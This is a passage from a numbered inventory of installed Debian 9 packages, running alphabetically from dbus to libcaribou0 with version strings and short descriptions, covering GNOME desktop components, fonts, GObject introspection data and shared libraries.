  466. dbus 1.10.18-1 simple interprocess messaging system (daemon and utilities)
  467. dbus-user-session 1.10.18-1 simple interprocess messaging system (systemd --user integration)
  468. dbus-x11 1.10.18-1 simple interprocess messaging system (X11 deps)
  469. dc 1.06.95-9+b3 GNU dc arbitrary precision reverse-polish calculator
  470. dconf-cli 0.26.0-2+b1 simple configuration storage system - utilities
  471. dconf-gsettings-backend:i386 0.26.0-2+b1 simple configuration storage system - GSettings back-end
  472. dconf-service 0.26.0-2+b1 simple configuration storage system - D-Bus service
  473. debconf 1.5.61 Debian configuration management system
  474. debconf-i18n 1.5.61 full internationalization support for debconf
  475. debian-archive-keyring 2017.5 GnuPG archive keys of the Debian archive
  476. debian-faq 8.1 Debian Frequently Asked Questions
  477. debianutils 4.8.1.1 Miscellaneous utilities specific to Debian
  478. default-java-plugin 2:1.8-58 Default Java Plugin for running applets and Java Web Start applications
  479. default-jre 2:1.8-58 Standard Java or Java compatible Runtime
  480. default-jre-headless 2:1.8-58 Standard Java or Java compatible Runtime (headless)
  481. desktop-base 9.0.2 common files for the Debian Desktop
  482. desktop-file-utils 0.23-1 Utilities for .desktop files
  483. dh-python 2.20170125 Debian helper tools for packaging Python libraries and applications
  484. dictionaries-common 1.27.2 spelling dictionaries - common utilities
  485. diffutils 1:3.5-3 File comparison utilities
  486. discover 2.1.2-7.1 hardware identification system
  487. discover-data 2.2013.01.11 Data lists for Discover hardware detection system
  488. distro-info-data 0.36 information about the distributions' releases (data files)
  489. dleyna-server 0.4.0-1.1 DBus service to interact with DLNA Digital Media Servers
  490. dmidecode 3.0-4 SMBIOS/DMI table decoder
  491. dmsetup 2:1.02.137-2 Linux Kernel Device Mapper userspace library
  492. dns-root-data 2017041102 DNS root data including root zone and DNSSEC key
  493. dnsmasq-base 2.76-5+b1 Small caching DNS proxy and DHCP/TFTP server
  494. doc-debian 6.4 Debian Project documentation and other documents
  495. docbook-xml 4.5-8 standard XML documentation system for software and systems
  496. dosfstools 4.1-1 utilities for making and checking MS-DOS FAT filesystems
  497. dpkg 1.18.24 Debian package management system
  498. dvdauthor 0.7.0-2 create DVD-Video file system
  499. e2fslibs:i386 1.43.4-2 ext2/ext3/ext4 file system libraries
  500. e2fsprogs 1.43.4-2 ext2/ext3/ext4 file system utilities
  501. eject 2.1.5+deb1+cvs20081104-13.2 ejects CDs and operates CD-Changers under Linux
  502. emacsen-common 2.0.8 Common facilities for all emacsen
  503. enchant 1.6.0-11+b1 Wrapper for various spell checker engines (binary programs)
  504. eog 3.20.5-1+b1 Eye of GNOME graphics viewer program
  505. evince 3.22.1-3+deb9u1 Document (PostScript, PDF) viewer
  506. evince-common 3.22.1-3+deb9u1 Document (PostScript, PDF) viewer - common files
  507. evolution 3.22.6-1 groupware suite with mail client and organizer
  508. evolution-common 3.22.6-1 architecture independent files for Evolution
  509. evolution-data-server 3.22.7-1 evolution database backend server
  510. evolution-data-server-common 3.22.7-1 architecture independent files for Evolution Data Server
  511. evolution-plugins 3.22.6-1 standard plugins for Evolution
  512. exfat-fuse 1.2.5-2 read and write exFAT driver for FUSE
  513. exfat-utils 1.2.5-2 utilities to create, check, label and dump exFAT filesystem
  514. fig2dev 1:3.2.6a-2 Utilities for converting XFig figure files
  515. file 1:5.30-1 Recognize the type of data in a file using "magic" numbers
  516. file-roller 3.22.3-1 archive manager for GNOME
  517. findutils 4.6.0+git+20161106-2 utilities for finding files--find, xargs
  518. firefox-esr 45.9.0esr-1 Mozilla Firefox web browser - Extended Support Release (ESR)
  519. five-or-more 1:3.22.2-1 make color lines of five or more length
  520. folks-common 0.11.3-2 library to aggregates people into metacontacts (common files)
  521. fontconfig 2.11.0-6.7+b1 generic font configuration library - support binaries
  522. fontconfig-config 2.11.0-6.7 generic font configuration library - configuration
  523. fonts-cantarell 0.0.25-2 sans serif font family designed for on-screen readability
  524. fonts-crosextra-caladea 20130214-1 Sans-serif font metric-compatible with Cambria font
  525. fonts-crosextra-carlito 20130920-1 Sans-serif font metric-compatible with Calibri font
  526. fonts-dejavu 2.37-1 metapackage to pull in fonts-dejavu-core and fonts-dejavu-extra
  527. fonts-dejavu-core 2.37-1 Vera font family derivate with additional characters
  528. fonts-dejavu-extra 2.37-1 Vera font family derivate with additional characters (extra variants)
  529. fonts-droid-fallback 1:6.0.1r16-1.1 handheld device font with extensive style and language support (fallback)
  530. fonts-liberation 1:1.07.4-2 Fonts with the same metrics as Times, Arial and Courier
  531. fonts-linuxlibertine 5.3.0-2 Linux Libertine family of fonts
  532. fonts-noto-mono 20161116-1 "No Tofu" monospaced font family with large Unicode coverage
  533. fonts-opensymbol 2:102.7+LibO5.2.7-1 OpenSymbol TrueType font
  534. fonts-sil-gentium 20081126:1.03-1 extended Unicode Latin font ("a typeface for the nations")
  535. fonts-sil-gentium-basic 1.1-7 smart Unicode font families (Basic and Book Basic) based on Gentium
  536. foomatic-db-compressed-ppds 20161201-1 OpenPrinting printer support - Compressed PPDs derived from the database
  537. foomatic-db-engine 4.0.12-2+b1 OpenPrinting printer support - programs
  538. four-in-a-row 1:3.22.1-1 Four in a Row game for GNOME
  539. freepats 20060219-1 Free patch set for MIDI audio synthesis
  540. fuse 2.9.7-1 Filesystem in Userspace
  541. gawk 1:4.1.4+dfsg-1 GNU awk, a pattern scanning and processing language
  542. gcc-6-base:i386 6.3.0-18 GCC, the GNU Compiler Collection (base package)
  543. gcr 3.20.0-5.1 GNOME crypto services (daemon and tools)
  544. gdisk 1.0.1-1 GPT fdisk text-mode partitioning tool
  545. gdm3 3.22.3-3 GNOME Display Manager
  546. gedit 3.22.0-2 official text editor of the GNOME desktop environment
  547. gedit-common 3.22.0-2 official text editor of the GNOME desktop environment (support files)
  548. gedit-plugins 3.22.0-1 set of plugins for gedit
  549. genisoimage 9:1.1.11-3+b2 Creates ISO-9660 CD-ROM filesystem images
  550. geoclue-2.0 2.4.5-1 geoinformation service
  551. geoip-database 20170512-1 IP lookup command line tools that use the GeoIP library (country database)
  552. gettext-base 0.19.8.1-2 GNU Internationalization utilities for the base system
  553. ghostscript 9.20~dfsg-3.2 interpreter for the PostScript language and for PDF
  554. gimp 2.8.18-1 GNU Image Manipulation Program
  555. gimp-data 2.8.18-1 Data files for GIMP
  556. gir1.2-accountsservice-1.0 0.6.43-1 GObject introspection data for AccountService
  557. gir1.2-atk-1.0:i386 2.22.0-1 ATK accessibility toolkit (GObject introspection)
  558. gir1.2-atspi-2.0:i386 2.22.0-6 Assistive Technology Service Provider (GObject introspection)
  559. gir1.2-caribou-1.0 0.4.21-1+b1 GObject introspection for the Caribou library
  560. gir1.2-champlain-0.12:i386 0.12.15-1 C library providing ClutterActor to display maps (GObject introspection)
  561. gir1.2-clutter-1.0:i386 1.26.0+dfsg-3 GObject introspection data for the Clutter 1.0 library
  562. gir1.2-clutter-gst-3.0:i386 3.0.24-1 Gobject introspection data for Clutter GStreamer elements
  563. gir1.2-cogl-1.0:i386 1.22.2-2 GObject introspection data for the Cogl 1.0 library
  564. gir1.2-coglpango-1.0:i386 1.22.2-2 GObject introspection data for the CoglPango 1.0 library
  565. gir1.2-evince-3.0:i386 3.22.1-3+deb9u1 GObject introspection data for the evince libraries
  566. gir1.2-freedesktop:i386 1.50.0-1+b1 Introspection data for some FreeDesktop components
  567. gir1.2-gck-1:i386 3.20.0-5.1 GObject introspection data for the GCK library
  568. gir1.2-gcr-3:i386 3.20.0-5.1 GObject introspection data for the GCR library
  569. gir1.2-gdata-0.0:i386 0.17.6-2 GObject introspection data for the GData webservices library
  570. gir1.2-gdesktopenums-3.0 3.22.0-1 GObject introspection for GSettings desktop-wide schemas
  571. gir1.2-gdkpixbuf-2.0:i386 2.36.5-2 GDK Pixbuf library - GObject-Introspection
  572. gir1.2-gdm-1.0 3.22.3-3 GObject introspection data for the GNOME Display Manager
  573. gir1.2-geoclue-2.0:i386 2.4.5-1 convenience library to interact with geoinformation service (introspection)
  574. gir1.2-geocodeglib-1.0:i386 3.20.1-2 introspection data for geocode-glib library
  575. gir1.2-gepub-0.4:i386 0.4-1 GObject introspection data for the libgepub library
  576. gir1.2-gfbgraph-0.2:i386 0.2.3-1+b2 GObject library for Facebook Graph API - GObject introspection
  577. gir1.2-git2-glib-1.0 0.24.4-1 GObject introspection data for the git2-glib-1.0 library
  578. gir1.2-glib-2.0:i386 1.50.0-1+b1 Introspection data for GLib, GObject, Gio and GModule
  579. gir1.2-gmenu-3.0 3.13.3-9 GObject introspection data for the GNOME menu library
  580. gir1.2-gnomebluetooth-1.0:i386 3.20.1-1 Introspection data for GnomeBluetooth
  581. gir1.2-gnomedesktop-3.0:i386 3.22.2-1 Introspection data for GnomeDesktop
  582. gir1.2-gnomekeyring-1.0 3.12.0-1+b2 GNOME keyring services library - introspection data
  583. gir1.2-goa-1.0:i386 3.22.5-1 Introspection data for GNOME Online Accounts
  584. gir1.2-grilo-0.3:i386 0.3.2-2 Framework for discovering and browsing media - GObject introspection data
  585. gir1.2-gst-plugins-base-1.0 1.10.4-1 GObject introspection data for the GStreamer Plugins Base library
  586. gir1.2-gstreamer-1.0 1.10.4-1 GObject introspection data for the GStreamer library
  587. gir1.2-gtk-3.0:i386 3.22.11-1 GTK+ graphical user interface library -- gir bindings
  588. gir1.2-gtkchamplain-0.12:i386 0.12.15-1 Gtk+ widget to display maps (GObject introspection)
  589. gir1.2-gtkclutter-1.0:i386 1.8.2-2 GObject introspection data for the GTK+ Clutter library
  590. gir1.2-gtksource-3.0:i386 3.22.2-1 gir files for the GTK+ syntax highlighting widget
  591. gir1.2-gucharmap-2.90:i386 1:9.0.2-1 GObject introspection data for the Unicode browser widget library
  592. gir1.2-gweather-3.0:i386 3.20.4-1 GObject introspection data for the GWeather library
  593. gir1.2-ibus-1.0:i386 1.5.14-3 Intelligent Input Bus - introspection data
  594. gir1.2-javascriptcoregtk-4.0:i386 2.16.3-2 JavaScript engine library from WebKitGTK+ - GObject introspection data
  595. gir1.2-json-1.0:i386 1.2.6-1 GLib JSON manipulation library (introspection data)
  596. gir1.2-mediaart-2.0:i386 1.9.0-2 GObject introspection data for MediaArt library
  597. gir1.2-mutter-3.0:i386 3.22.3-2 GObject introspection data for Mutter
  598. gir1.2-networkmanager-1.0:i386 1.6.2-3 GObject introspection data for NetworkManager
  599. gir1.2-nmgtk-1.0:i386 1.4.4-1 GObject introspection data for libnm-gtk
  600. gir1.2-notify-0.7:i386 0.7.7-2 sends desktop notifications to a notification daemon (Introspection files)
  601. gir1.2-packagekitglib-1.0 1.1.5-2 GObject introspection data for the PackageKit GLib library
  602. gir1.2-pango-1.0:i386 1.40.5-1 Layout and rendering of internationalized text - gir bindings
  603. gir1.2-peas-1.0:i386 1.20.0-1+b1 Application plugin library (introspection files)
  604. gir1.2-polkit-1.0 0.105-18 GObject introspection data for PolicyKit
  605. gir1.2-rb-3.0:i386 3.4.1-2+b1 GObject introspection data for the rhythmbox music player
  606. gir1.2-rest-0.7 0.8.0-2 REST service access library (introspection files)
  607. gir1.2-secret-1:i386 0.18.5-3.1 Secret store (GObject-Introspection)
  608. gir1.2-soup-2.4:i386 2.56.0-2+deb9u1 GObject introspection data for the libsoup HTTP library
  609. gir1.2-telepathyglib-0.12 0.24.1-1.1 GLib Telepathy connection manager library (GObject-Introspection)
  610. gir1.2-telepathylogger-0.2 0.8.2-2 Telepathy logger service - introspection
  611. gir1.2-totem-1.0:i386 3.22.1-1 GObject introspection data for Totem media player
  612. gir1.2-totem-plparser-1.0:i386 3.10.7-1+b1 GObject introspection data for the Totem Playlist Parser library
  613. gir1.2-tracker-1.0:i386 1.10.5-1 GObject introspection data for Tracker
  614. gir1.2-upowerglib-1.0:i386 0.99.4-4+b1 GObject introspection data for upower
  615. gir1.2-vte-2.91:i386 0.46.1-1 GObject introspection data for the VTE library
  616. gir1.2-webkit2-4.0:i386 2.16.3-2 Web content engine library for GTK+ - GObject introspection data
  617. gir1.2-wnck-3.0:i386 3.20.1-3 GObject introspection data for the WNCK library
  618. gir1.2-zeitgeist-2.0:i386 0.9.16-0.2+b1 library to access Zeitgeist - GObject introspection data
  619. gir1.2-zpj-0.0:i386 0.0.3-3 GObject introspection data for the libzapojit library
  620. git 1:2.11.0-3+deb9u1 fast, scalable, distributed revision control system
  621. git-man 1:2.11.0-3+deb9u1 fast, scalable, distributed revision control system (manual pages)
  622. gjs 1.46.0-1+b2 Mozilla-based javascript bindings for the GNOME platform
  623. gkbd-capplet 3.22.0.1-1+b1 GNOME control center tools for libgnomekbd
  624. glib-networking:i386 2.50.0-1+b1 network-related giomodules for GLib
  625. glib-networking-common 2.50.0-1 network-related giomodules for GLib - data files
  626. glib-networking-services 2.50.0-1+b1 network-related giomodules for GLib - D-Bus services
  627. gnome 1:3.22+3 Full GNOME Desktop Environment, with extra components
  628. gnome-accessibility-themes 3.22.2-2 Accessibility themes for the GNOME desktop
  629. gnome-backgrounds 3.22.1-1 Set of backgrounds packaged with the GNOME desktop
  630. gnome-bluetooth 3.20.1-1 GNOME Bluetooth tools
  631. gnome-calculator 3.22.3-1 GNOME desktop calculator
  632. gnome-calendar 3.22.4-2 Calendar application for GNOME
  633. gnome-characters 3.22.0-1 character map application
  634. gnome-chess 1:3.22.2-1+b1 chess game with 3D graphics
  635. gnome-clocks 3.22.1-1 Simple GNOME app with stopwatch, timer, and world clock support
  636. gnome-color-manager 3.22.2-1 Color management integration for the GNOME desktop environment
  637. gnome-contacts 3.22.1-1+b2 Contacts manager for GNOME
  638. gnome-control-center 1:3.22.2-3 utilities to configure the GNOME desktop
  639. gnome-control-center-data 1:3.22.2-3 configuration applets for GNOME - data files
  640. gnome-core 1:3.22+3 GNOME Desktop Environment -- essential components
  641. gnome-desktop3-data 3.22.2-1 Common files for GNOME desktop apps
  642. gnome-dictionary 3.20.0-3+b1 GNOME dictionary application
  643. gnome-disk-utility 3.22.1-1 manage and configure disk drives and media
  644. gnome-documents 3.22.1-1 Document manager for GNOME
  645. gnome-font-viewer 3.22.0-1+b1 font viewer for GNOME
  646. gnome-games 1:3.22+3 games for the GNOME desktop
  647. gnome-getting-started-docs 3.22.0-1 Help a new user get started in GNOME
  648. gnome-keyring 3.20.0-3 GNOME keyring services (daemon and tools)
  649. gnome-klotski 1:3.22.1-1 Klotski puzzle game for GNOME
  650. gnome-logs 3.22.1-2 viewer for the systemd journal.
  651. gnome-mahjongg 1:3.22.0-1 classic Eastern tile game for GNOME
  652. gnome-maps 3.22.2-1 map application for GNOME
  653. gnome-menus 3.13.3-9 GNOME implementation of the freedesktop menu specification
  654. gnome-mines 1:3.22.2-1 popular minesweeper puzzle game for GNOME
  655. gnome-music 3.22.2-1 Music is the new GNOME music playing application
  656. gnome-nibbles 1:3.22.2.2-1 snake game, up to four players
  657. gnome-online-accounts 3.22.5-1 service to manage online accounts for the GNOME desktop
  658. gnome-online-miners 3.22.0-1 Crawls through your online content
  659. gnome-orca 3.22.2-3 Scriptable screen reader
  660. gnome-robots 1:3.22.1-1 improved old BSD robots game
  661. gnome-screenshot 3.22.0-1+b1 screenshot application for GNOME
  662. gnome-session 3.22.3-1 GNOME Session Manager - GNOME 3 session
  663. gnome-session-bin 3.22.3-1 GNOME Session Manager - Minimal runtime
  664. gnome-session-common 3.22.3-1 GNOME Session Manager - common files
  665. gnome-settings-daemon 3.22.2-2 daemon handling the GNOME session settings
  666. gnome-shell 3.22.3-3 graphical shell for the GNOME desktop
  667. gnome-shell-common 3.22.3-3 common files for the GNOME graphical shell
  668. gnome-shell-extensions 3.22.2-1 Extensions to extend functionality of GNOME Shell
  669. gnome-software 3.22.5-1 Software Center for GNOME
  670. gnome-software-common 3.22.5-1 Software Center for GNOME (common files)
  671. gnome-sound-recorder 3.21.92-2 simple and modern sound recorder for GNOME
  672. gnome-sudoku 1:3.22.2-1 Sudoku puzzle game for GNOME
  673. gnome-sushi 3.21.91-2 sushi is a quick previewer for nautilus
  674. gnome-system-monitor 3.22.2-1 Process viewer and system resource monitor for GNOME
  675. gnome-taquin 3.22.0-1 game to move tiles so that they reach their places
  676. gnome-terminal 3.22.2-1 GNOME terminal emulator application
  677. gnome-terminal-data 3.22.2-1 Data files for the GNOME terminal emulator
  678. gnome-tetravex 1:3.22.0-1 put tiles on a board and match their edges together
  679. gnome-themes-standard:i386 3.22.2-2 Adwaita GTK+ 2 theme — engine
  680. gnome-themes-standard-data 3.22.2-2 Adwaita GTK+ 2 theme — common files
  681. gnome-tweak-tool 3.22.0-1 tool to adjust advanced configuration settings for GNOME
  682. gnome-user-guide 3.22.0-1 GNOME user's guide
  683. gnome-user-share 3.18.3-1+b1 User level public file sharing via WebDAV or ObexFTP
  684. gnome-video-effects 0.4.1-3 Collection of GStreamer effects
  685. gnome-weather 3.20.2-1 access current conditions and forecasts
  686. gnupg 2.1.18-6 GNU privacy guard - a free PGP replacement
  687. gnupg-agent 2.1.18-6 GNU privacy guard - cryptographic agent
  688. gpgv 2.1.18-6 GNU privacy guard - signature verification tool
  689. grep 2.27-2 GNU grep, egrep and fgrep
  690. grilo-plugins-0.3:i386 0.3.3-1 Framework for discovering and browsing media - Plugins
  691. groff-base 1.22.3-9 GNU troff text-formatting system (base system components)
  692. growisofs 7.1-11.1 DVD+-RW/R recorder
  693. grub-common 2.02~beta3-5 GRand Unified Bootloader (common files)
  694. grub-pc 2.02~beta3-5 GRand Unified Bootloader, version 2 (PC/BIOS version)
  695. grub-pc-bin 2.02~beta3-5 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
  696. grub2-common 2.02~beta3-5 GRand Unified Bootloader (common files for version 2)
  697. gsettings-desktop-schemas 3.22.0-1 GSettings desktop-wide schemas
  698. gsfonts 1:8.11+urwcyr1.0.7~pre44-4.3 Fonts for the Ghostscript interpreter(s)
  699. gstreamer1.0-clutter-3.0 3.0.24-1 Clutter PLugin for GStreamer 1.0
  700. gstreamer1.0-libav:i386 1.10.4-1 libav plugin for GStreamer
  701. gstreamer1.0-plugins-bad:i386 1.10.4-1 GStreamer plugins from the "bad" set
  702. gstreamer1.0-plugins-base:i386 1.10.4-1 GStreamer plugins from the "base" set
  703. gstreamer1.0-plugins-good:i386 1.10.4-1 GStreamer plugins from the "good" set
  704. gstreamer1.0-plugins-ugly:i386 1.10.4-1 GStreamer plugins from the "ugly" set
  705. gstreamer1.0-pulseaudio:i386 1.10.4-1 GStreamer plugin for PulseAudio
  706. gstreamer1.0-x:i386 1.10.4-1 GStreamer plugins for X11 and Pango
  707. gtk-update-icon-cache 3.22.11-1 icon theme caching utility
  708. gtk2-engines-pixbuf:i386 2.24.31-2 pixbuf-based theme for GTK+ 2.x
  709. gvfs:i386 1.30.4-1 userspace virtual filesystem - GIO module
  710. gvfs-backends 1.30.4-1 userspace virtual filesystem - backends
  711. gvfs-bin 1.30.4-1 userspace virtual filesystem - binaries
  712. gvfs-common 1.30.4-1 userspace virtual filesystem - common data files
  713. gvfs-daemons 1.30.4-1 userspace virtual filesystem - servers
  714. gvfs-fuse 1.30.4-1 userspace virtual filesystem - fuse server
  715. gvfs-libs:i386 1.30.4-1 userspace virtual filesystem - private libraries
  716. gzip 1.6-5+b1 GNU compression utilities
  717. hdparm 9.51+ds-1 tune hard disk parameters for high performance
  718. hicolor-icon-theme 0.15-1 default fallback theme for FreeDesktop.org icon themes
  719. hitori 3.22.0-1 logic puzzle game similar to sudoku
  720. hoichess 0.19.0-5+b1 xboard compatible chess engine to play chess with
  721. hostname 3.18+b1 utility to set/show the host name or domain name
  722. hp-ppd 0.9-0.3 HP Postscript Printer Definition (PPD) files
  723. hplip 3.16.11+repack0-3 HP Linux Printing and Imaging System (HPLIP)
  724. hplip-data 3.16.11+repack0-3 HP Linux Printing and Imaging - data files
  725. hunspell-en-us 20070829-7 English_american dictionary for hunspell
  726. hyphen-en-us 2.8.8-5 English (US) hyphenation patterns
  727. i965-va-driver:i386 1.7.3-1 VAAPI driver for Intel G45 & HD Graphics family
  728. iagno 1:3.22.0-1 popular Othello game for GNOME
  729. iamerican 3.4.00-5 American English dictionary for ispell (standard version)
  730. ibritish 3.4.00-5 British English dictionary for ispell (standard version)
  731. icedtea-8-plugin:i386 1.6.2-3.1 web browser plugin based on OpenJDK and IcedTea to execute Java applets
  732. icedtea-netx:i386 1.6.2-3.1 NetX - implementation of the Java Network Launching Protocol (JNLP)
  733. icedtea-netx-common 1.6.2-3.1 NetX - implementation of the Java Network Launching Protocol (JNLP)
  734. ienglish-common 3.4.00-5 Common files for British and American ispell dictionaries
  735. ifupdown 0.8.19 high level tools to configure network interfaces
  736. iio-sensor-proxy 2.0-4 IIO sensors to D-Bus proxy
  737. imagemagick 8:6.9.7.4+dfsg-11+deb9u1 image manipulation programs -- binaries
  738. imagemagick-6-common 8:6.9.7.4+dfsg-11+deb9u1 image manipulation programs -- infrastructure
  739. imagemagick-6.q16 8:6.9.7.4+dfsg-11+deb9u1 image manipulation programs -- quantum depth Q16
  740. init 1.48 metapackage ensuring an init system is installed
  741. init-system-helpers 1.48 helper tools for all init systems
  742. initramfs-tools 0.130 generic modular initramfs generator (automation)
  743. initramfs-tools-core 0.130 generic modular initramfs generator (core tools)
  744. inkscape 0.92.1-1 vector-based drawing program
  745. installation-report 2.62 system installation report
  746. iproute2 4.9.0-1 networking and traffic control tools
  747. iptables 1.6.0+snapshot20161117-6 administration tools for packet filtering and NAT
  748. iputils-arping 3:20161105-1 Tool to send ICMP echo requests to an ARP address
  749. iputils-ping 3:20161105-1 Tools to test the reachability of network hosts
  750. isc-dhcp-client 4.3.5-3 DHCP client for automatically obtaining an IP address
  751. isc-dhcp-common 4.3.5-3 common manpages relevant to all of the isc-dhcp packages
  752. iso-codes 3.75-1 ISO language, territory, currency, script codes and their translations
  753. ispell 3.4.00-5 International Ispell (an interactive spelling corrector)
  754. iw 4.9-0.1 tool for configuring Linux wireless devices
  755. java-common 0.58 Base package for Java runtimes
  756. kbd 2.0.3-2+b1 Linux console font and keytable utilities
  757. keyboard-configuration 1.164 system-wide keyboard preferences
  758. klibc-utils 2.0.4-9 small utilities built with klibc for early boot
  759. kmod 23-2 tools for managing Linux kernel modules
  760. krb5-locales 1.15-1 internationalization support for MIT Kerberos
  761. laptop-detect 0.13.8 system chassis type checker
  762. less 481-2.1 pager program similar to more
  763. liba52-0.7.4:i386 0.7.4-19 library for decoding ATSC A/52 streams
  764. libaa1:i386 1.4p5-44+b1 ASCII art library
  765. libaacs0:i386 0.8.1-2 free-and-libre implementation of AACS
  766. libabw-0.1-1:i386 0.1.1-4 library for reading and writing AbiWord(tm) documents
  767. libaccountsservice0:i386 0.6.43-1 query and manipulate user account information - shared libraries
  768. libacl1:i386 2.2.52-3+b1 Access control list shared library
  769. libamd2:i386 1:4.5.4-1 approximate minimum degree ordering library for sparse matrices
  770. libao-common 1.2.2-1 Cross Platform Audio Output Library (Common files)
  771. libao4 1.2.2-1 Cross Platform Audio Output Library
  772. libapache2-mod-dnssd 0.6-3.1 Zeroconf support for Apache 2 via avahi
  773. libapparmor1:i386 2.11.0-3 changehat AppArmor library
  774. libappstream-glib8:i386 0.6.8-1 GNOME library to access AppStream services
  775. libappstream4:i386 0.10.6-2 Library to access AppStream services
  776. libapr1:i386 1.5.2-5 Apache Portable Runtime Library
  777. libaprutil1:i386 1.5.4-3 Apache Portable Runtime Utility Library
  778. libaprutil1-dbd-sqlite3:i386 1.5.4-3 Apache Portable Runtime Utility Library - SQLite3 Driver
  779. libaprutil1-ldap:i386 1.5.4-3 Apache Portable Runtime Utility Library - LDAP Driver
  780. libapt-inst2.0:i386 1.4.6 deb package format runtime library
  781. libapt-pkg5.0:i386 1.4.6 package management runtime library
  782. libarchive13:i386 3.2.2-2 Multi-format archive and compression library (shared library)
  783. libasound2:i386 1.1.3-5 shared library for ALSA applications
  784. libasound2-data 1.1.3-5 Configuration files and profiles for ALSA drivers
  785. libasound2-plugins:i386 1.1.1-1 ALSA library additional plugins
  786. libaspell15:i386 0.60.7~20110707-3+b2 GNU Aspell spell-checker runtime library
  787. libass5:i386 1:0.13.4-2 library for SSA/ASS subtitles rendering
  788. libassuan0:i386 2.4.3-2 IPC library for the GnuPG components
  789. libasyncns0:i386 0.8-6 Asynchronous name service query library
  790. libatasmart4:i386 0.19-4+b1 ATA S.M.A.R.T. reading and parsing library
  791. libatk-adaptor:i386 2.22.0-2 AT-SPI 2 toolkit bridge
  792. libatk-bridge2.0-0:i386 2.22.0-2 AT-SPI 2 toolkit bridge - shared library
  793. libatk-wrapper-java 0.33.3-13 ATK implementation for Java using JNI
  794. libatk-wrapper-java-jni:i386 0.33.3-13 ATK implementation for Java using JNI (JNI bindings)
  795. libatk1.0-0:i386 2.22.0-1 ATK accessibility toolkit
  796. libatk1.0-data 2.22.0-1 Common files for the ATK accessibility toolkit
  797. libatkmm-1.6-1v5:i386 2.24.2-2 C++ wrappers for ATK accessibility toolkit (shared libraries)
  798. libatomic1:i386 6.3.0-18 support library providing __atomic built-in functions
  799. libatspi2.0-0:i386 2.22.0-6 Assistive Technology Service Provider Interface - shared library
  800. libattr1:i386 1:2.4.47-2+b2 Extended attribute shared library
  801. libaudio2:i386 1.9.4-5+b1 Network Audio System - shared libraries
  802. libaudit-common 1:2.6.7-2 Dynamic library for security auditing - common files
  803. libaudit1:i386 1:2.6.7-2 Dynamic library for security auditing
  804. libauthen-sasl-perl 2.1600-1 Authen::SASL - SASL Authentication framework
  805. libavahi-client3:i386 0.6.32-2 Avahi client library
  806. libavahi-common-data:i386 0.6.32-2 Avahi common data files
  807. libavahi-common3:i386 0.6.32-2 Avahi common library
  808. libavahi-core7:i386 0.6.32-2 Avahi's embeddable mDNS/DNS-SD library
  809. libavahi-glib1:i386 0.6.32-2 Avahi GLib integration library
  810. libavahi-gobject0:i386 0.6.32-2 Avahi GObject library
  811. libavahi-ui-gtk3-0:i386 0.6.32-2 Avahi GTK+ User interface library for GTK3
  812. libavc1394-0:i386 0.5.4-4+b1 control IEEE 1394 audio/video devices
  813. libavcodec57:i386 7:3.2.5-1 FFmpeg library with de/encoders for audio/video codecs - runtime files
  814. libavfilter6:i386 7:3.2.5-1 FFmpeg library containing media filters - runtime files
  815. libavformat57:i386 7:3.2.5-1 FFmpeg library with (de)muxers for multimedia containers - runtime files
  816. libavresample3:i386 7:3.2.5-1 FFmpeg compatibility library for resampling - runtime files
  817. libavutil55:i386 7:3.2.5-1 FFmpeg library with functions for simplifying programming - runtime files
  818. libbabl-0.1-0:i386 0.1.18-1 Dynamic, any to any, pixel format conversion library
  819. libbind9-140:i386 1:9.10.3.dfsg.P4-12.3+deb9u2 BIND9 Shared Library used by BIND
  820. libblas-common 3.7.0-2 Dependency package for all BLAS implementations
  821. libblas3 3.7.0-2 Basic Linear Algebra Reference implementations, shared library
  822. libblkid1:i386 2.29.2-1 block device ID library
  823. libbluetooth3:i386 5.43-2 Library to use the BlueZ Linux Bluetooth stack
  824. libbluray1:i386 1:0.9.3-3 Blu-ray disc playback support library (shared library)
  825. libboost-date-time1.62.0:i386 1.62.0+dfsg-4 set of date-time libraries based on generic programming concepts
  826. libboost-filesystem1.62.0:i386 1.62.0+dfsg-4 filesystem operations (portable paths, iteration over directories, etc) in C++
  827. libboost-iostreams1.62.0:i386 1.62.0+dfsg-4 Boost.Iostreams Library
  828. libboost-system1.62.0:i386 1.62.0+dfsg-4 Operating system (e.g. diagnostics support) library
  829. libboost-thread1.62.0:i386 1.62.0+dfsg-4 portable C++ multi-threading
  830. libbrasero-media3-1:i386 3.12.1-4 CD/DVD burning library for GNOME - runtime
  831. libbrlapi0.6:i386 5.4-7 braille display access via BRLTTY - shared library
  832. libbs2b0:i386 3.1.0+dfsg-2.2 Bauer stereophonic-to-binaural DSP library
  833. libbsd0:i386 0.8.3-1 utility functions from BSD systems - shared library
  834. libburn4:i386 1.4.6-1 library to provide CD/DVD writing functions
  835. libbz2-1.0:i386 1.0.6-8.1 high-quality block-sorting file compressor library - runtime
  836. libc-bin 2.24-11+deb9u1 GNU C Library: Binaries
  837. libc-l10n 2.24-11+deb9u1 GNU C Library: localization files
  838. libc6:i386 2.24-11+deb9u1 GNU C Library: Shared libraries
  839. libcaca0:i386 0.99.beta19-2+b2 colour ASCII art library
  840. libcacard0:i386 1:2.5.0-3 Virtual Common Access Card (CAC) Emulator (runtime library)
  841. libcairo-gobject2:i386 1.14.8-1 Cairo 2D vector graphics library (GObject library)
  842. libcairo-perl 1.106-1+b2 Perl interface to the Cairo graphics library
  843. libcairo2:i386 1.14.8-1 Cairo 2D vector graphics library
  844. libcairomm-1.0-1v5:i386 1.12.0-1+b1 C++ wrappers for Cairo (shared libraries)
  845. libcamd2:i386 1:4.5.4-1 symmetric approximate minimum degree library for sparse matrices
  846. libcamel-1.2-59:i386 3.22.7-1 Evolution MIME message handling library
  847. libcanberra-gtk3-0:i386 0.30-3 GTK+ 3.0 helper for playing widget event sounds with libcanberra
  848. libcanberra-gtk3-module:i386 0.30-3 translates GTK3 widgets signals to event sounds
  849. libcanberra-pulse:i386 0.30-3 PulseAudio backend for libcanberra
  850. libcanberra0:i386 0.30-3 simple abstract interface for playing event sounds
  851. libcap-ng0:i386 0.7.7-3+b1 An alternate POSIX capabilities library
  852. libcap2:i386 1:2.25-1 POSIX 1003.1e capabilities (library)
  853. libcap2-bin 1:2.25-1 POSIX 1003.1e capabilities (utilities)
  854. libcaribou-common 0.4.21-1 Configurable on screen keyboard with scanning mode - common files
  855. libcaribou-gtk-module:i386 0.4.21-1+b1 Configurable on screen keyboard with scanning mode (GTK+ 2.0 module)
  856. libcaribou-gtk3-module:i386 0.4.21-1+b1 Configurable on screen keyboard with scanning mode (GTK+ 3.0 module)
  857. libcaribou0:i386 0.4.21-1+b1 Configurable on screen keyboard with scanning mode - library
